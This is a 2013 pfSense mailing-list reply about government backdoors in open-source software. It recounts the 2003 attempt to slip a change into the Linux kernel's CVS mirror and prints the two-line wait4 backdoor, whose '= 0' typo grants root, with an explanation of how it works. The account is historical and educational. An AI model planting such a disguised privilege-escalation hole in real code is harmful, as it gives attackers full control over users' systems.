On Oct 9, 2013, at 7:36 PM, Thinker Rix <thinke...@rocketmail.com> wrote:
> On 2013-10-09 20:04, Walter Parker wrote: >> About that made in the USA thing, the NSA has deals with overseas companies >> as well... >> >> Plus, the GCHQ and several other foreign spy agency's have done similar >> things, so if you starting asking, you discover that the major governments >> are trying to do this and have succeed more often than we would like. > > Yes, it is horrifying. > >> Also, the whole "We have to ask to ask the question to get the denial on >> record" only matters for the government or people with lots of money. The >> Government can sue you/arrest you for a lie, but do "you" have enough money >> to pay for lawsuits against a company? Most lawyers want money upfront >> unless you have clear suit against a company with lots of money. >> >> When was the last (or even first time) that a company was sued and lost to a >> private party for something like this, outside of class action lawsuits > > I do not want to sue or otherwise harm anybody. > > I only asked a very simple question and now read the answers. Very > interesting answers, I think. Not interesting, just simple ego stroking. As for those who want to read the source to find bugs … Back in 2003 Linux used a system called BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. Every change to the master code would come with a short explanation, which always included a pointer to the record of its approval. But some people didn’t like BitKeeper, so a second copy of the source code was kept so that developers could get the code via another code system called CVS. The CVS copy of the code was a direct clone of the primary BitKeeper copy. But on Nov. 5, 2003, Larry McVoy noticed that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in (electronically) to the CVS server and inserted this change. What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code: if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL; [Exercise for readers who know the C programming language: What is unusual about this code? Answer appears below.] A casual reading by anyone less than expert would interpret this as innocuous error-checking code to make wait4 return an error code when wait4 was called in a certain way that was forbidden by the documentation. But a really careful (and somewhat) expert reader would notice that, near the end of the first line, it said “= 0” rather than “== 0”. The normal thing to write in code like this is “== 0”, which tests whether the user ID of the currently running code (current->uid) is equal to zero, without modifying the user ID. But what actually appears is “= 0”, which has the effect of setting the user ID to zero. Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor. This is a very clever piece of work. It looks like innocuous error checking, but it’s really a back door. And it was slipped into the code outside the normal approval process, to avoid any possibility that the approval process would notice what was up. Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack. Unless somebody confesses, or a smoking-gun document turns up, we’ll never know. We still dont have a report on the kernel.org hack of 2011. Why not? Many people say, "calm down, its git they can’t have inserted backdoors etc without messing up the git history/changelog/hashes/whatever". But what if git was modified and backdoored previously to hide some objects/changes? How would such an attack work? Lets say you discover a problem in git, which allows you to omit changesets in its output. How would that work to backdoor the kernel? Older versions of git would tell you the hashes were wrong. Implementations of git in other languages would tell you the hashes were wrong. Manually checking would tell you the hashes were wrong. It's just not feasible. Plus, git is stored in git, so you'd need to backdoor git first... ;) Also, the source of git would also reveal a problem when examined. To get around that one starts hypothesizing the sort of globe-spanning conspiracy against which one might as well give up ("well, maybe all my compilers (not just gcc, all of them) are also backdoored to backdoor themselves, and each other if you cross-compile, then backdoor git too...”). pfSense is based on FreeBSD. What if FreeBSD was backdoored by the NSA or other? How would you know? See? just useless ego stroking, and a lot of resultant heat, rather than solutions to problems. Can we get back to pfSense now? Jim _______________________________________________ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list